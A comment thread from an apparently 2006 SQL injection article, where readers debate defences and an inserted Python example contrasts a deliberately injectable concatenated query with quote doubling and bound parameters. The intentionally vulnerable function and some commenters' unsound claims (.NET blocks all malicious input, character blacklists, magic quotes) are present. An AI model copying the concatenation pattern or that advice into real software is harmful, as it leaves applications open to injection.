I found this BLOG which has some SQL Injection info, along with a link of a video where a guy uses SQL injection to replace a logging dll on a webserver and captures credit card information.
Anyone who thinks this is no big deal needs to watch. Goto this URL and then look for the video link.
http://devauthority.com/blogs/jwooley/archive/2006/07/11/1672.aspx
|
|
| Subject:
|
nothing worked |
Date: |
17 Jul. 2006 |
| From: |
V8 |
| I'm using PHP/MySQL for some time now and i am used to filter user input but when I found this article I tried some of the injections on my server and none of them worked. Sorry. |
|
Subject: stored procedure
Date: 24 Jul. 2006
From: Ivan
Stored procedures are not always safe because they construct a SQL statement at runtime pretty much the same way as a program would. It is possible, however, that arguments are being passed to a stored procedure at runtime and that the actual SQL statement doesn't contain the arguments. There are sites which explain how to do this in SQL Server.
Subject: jim
Date: 1 Aug. 2006
From: jim.scuba.kennedygmail.com
Very scary that people think the use of stored procs will protect them from SQL injection (or the use of a particular web or RDBMS technology).
Folks, USE BIND VARIABLES. Don't allow dynamic SQL. If you want to use stored procs that is fine, but your stored procs better NOT use dynamic SQL. This problem isn't solely a Windows/SQL Server problem; it can appear on any DB server and any OS with any language if you do it right (wrong). Again, use bind variables. Also, bind variables scale better.
Subject: the .NET tech
Date: 4 Aug. 2006
From: Aaron
The .NET tech protects from malicious code in any inputs. The better option for security is .NET development.
Subject: Good reading
Date: 10 Aug. 2006
From: Elijah Daniel
This is very informative and a recommended reading.
Keep it up!
Subject: very nice
Date: 16 Aug. 2006
From: EtHeReAl
Really very nice article for newbies and experts.
Thanks very much.
Subject: hello
Date: 16 Aug. 2006
From: pls how can i find HTML source code of ulr
Please, how can I find the HTML source code of a URL?
Subject: my way
Date: 27 Aug. 2006
From: felpharyahoo.com
Ya, don't execute the code if it contains ; / \ ' " = - it's that simple. Why does anybody try to complicate it????
Subject: my way
Date: 7 Sep. 2006
From: Libstar
Not that simple, felpharyahoo.com!! What if the user requirement is to enter a string including one of these characters? ; / \ ' " = - (e.g. the surname O'Neill, which includes an apostrophe)
You gonna tell your client they can't have what they need? They gonna tell ya you're not getting paid!!!
Subject: to the person above me
Date: 8 Sep. 2006
From: LostDreamer
Well, if you do not execute any SQL query containing those characters, how would one make a forum? Or any place where people can post messages?
When they use a word with a ' in it, the code would not execute the insert query.....
Also a good option against SQL Injection is Magic Quotes.... it replaces all the ' & " with \' & \", which would not end / alter the SQL query.
Subject: Very useful article, but...
Date: 15 Sep. 2006
From: iframe srcfileciframe
What about Crypt() and Decrypt() functions? For numbers we have no problem. If they are strings we can crypt and decrypt the data using an easy algorithm, or we can restrict a string value to only contain the characters 1234567890ABCDEFG.
Subject: The grammar in this article is horrific!
Date: 21 Sep. 2006
From: I dont have time for this...
Seriously, proofread your pages.
Subject: language library problem
Date: 23 Sep. 2006
From: gaba
Frankly people, this is ridiculous. You folks should start getting on at your language designers to do things properly so this stuff is not a problem.
The only problem here is that data passed to SQL does not have 'special' characters quoted before it gets to the query.
You should be able to do this manually. However, you should be given library functions that automatically do this for you.
    searchfor="myid";
    query="select * from table where id=?";
    executequery(query, searchfor);
If the execute query function automatically removes all SQL injection problems, this is a non-issue.
I consider it a fatal language flaw not to have such a library issued as the standard database implementation.
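The bind-variable query jim and gaba describe, run side by side with the string-concatenated form the article attacks and with the quote-doubling escape Rust asks about below, so the difference is visible on Libstar's O'Neill input. This is an added example, not code from the article or from any commenter; it uses Python's standard sqlite3 module against an in-memory table with constructed sample rows, and the function names (make_db, lookup_concat, lookup_doubled, lookup_bound, compare) are this example's own.

```python
"""Concatenated SQL vs. quote-doubling vs. a bound parameter, on the same input.

Added example, not part of the article or of any commenter's posted code.
Uses an in-memory SQLite table with constructed sample users.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build a throwaway in-memory database with constructed sample surnames."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, surname TEXT, secret TEXT)"
    )
    # The seed data itself is inserted with bound parameters.
    conn.executemany(
        "INSERT INTO users (surname, secret) VALUES (?, ?)",
        [("Smith", "s-1"), ("O'Neill", "s-2"), ("Jones", "s-3")],
    )
    return conn


def lookup_concat(conn: sqlite3.Connection, surname: str) -> list:
    """The 'before' case the article warns about: user input spliced into the
    SQL text. Any quote in the input changes the statement itself, so a
    legitimate apostrophe breaks it and a crafted one rewrites it."""
    sql = "SELECT surname FROM users WHERE surname = '" + surname + "' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def lookup_doubled(conn: sqlite3.Connection, surname: str) -> list:
    """Rust's quote-doubling escape, for comparison. It is correct for a single
    quote inside a quoted string literal, but it must be applied to every
    literal every time and covers only that one character, which is why
    binding is the approach jim and gaba recommend."""
    escaped = surname.replace("'", "''")
    sql = "SELECT surname FROM users WHERE surname = '" + escaped + "' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def lookup_bound(conn: sqlite3.Connection, surname: str) -> list:
    """Bind variable (the '?' placeholder in gaba's sketch): the value travels
    to the engine separately from the SQL text and is never parsed as SQL,
    so O'Neill matches as data and a crafted string matches nothing."""
    sql = "SELECT surname FROM users WHERE surname = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (surname,))]


def compare(conn: sqlite3.Connection, surname: str) -> dict:
    """Run one input through all three forms and report what each returned,
    or 'error' when the concatenated statement no longer parses."""
    try:
        concat = lookup_concat(conn, surname)
    except sqlite3.OperationalError:
        concat = "error"
    return {
        "concat": concat,
        "doubled": lookup_doubled(conn, surname),
        "bound": lookup_bound(conn, surname),
    }


if __name__ == "__main__":
    db = make_db()
    for name in ("Smith", "O'Neill"):
        print(repr(name), compare(db, name))
```

On the O'Neill input the concatenated form fails with a syntax error (the apostrophe terminates the string literal early), while both the doubled and the bound forms return the row; only the bound form does so without the application having to remember an escape rule for every literal.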
Subject: Seriously Lacking
Date: 24 Sep. 2006
From: Rust
So it's easy to see that this article is good information for the fledgling cracker out there, but what about sysadmins? There's a hundred lines on how to f*ck the system, but only 3 useful lines on how to prevent it.
Obviously, any competent server admin will have hardened his system, but what about all the developers out there? If they filter out "single quote, double quote, slash, back slash, semi colon, extended characters like NULL, carriage return, new line, etc", what are they replaced with? A single quote is easy to replace with two single quotes (which are stored in the database as a single quote), but does that work for the rest? Nope.
Sorry folks, but this article is only useful to crackers and server ad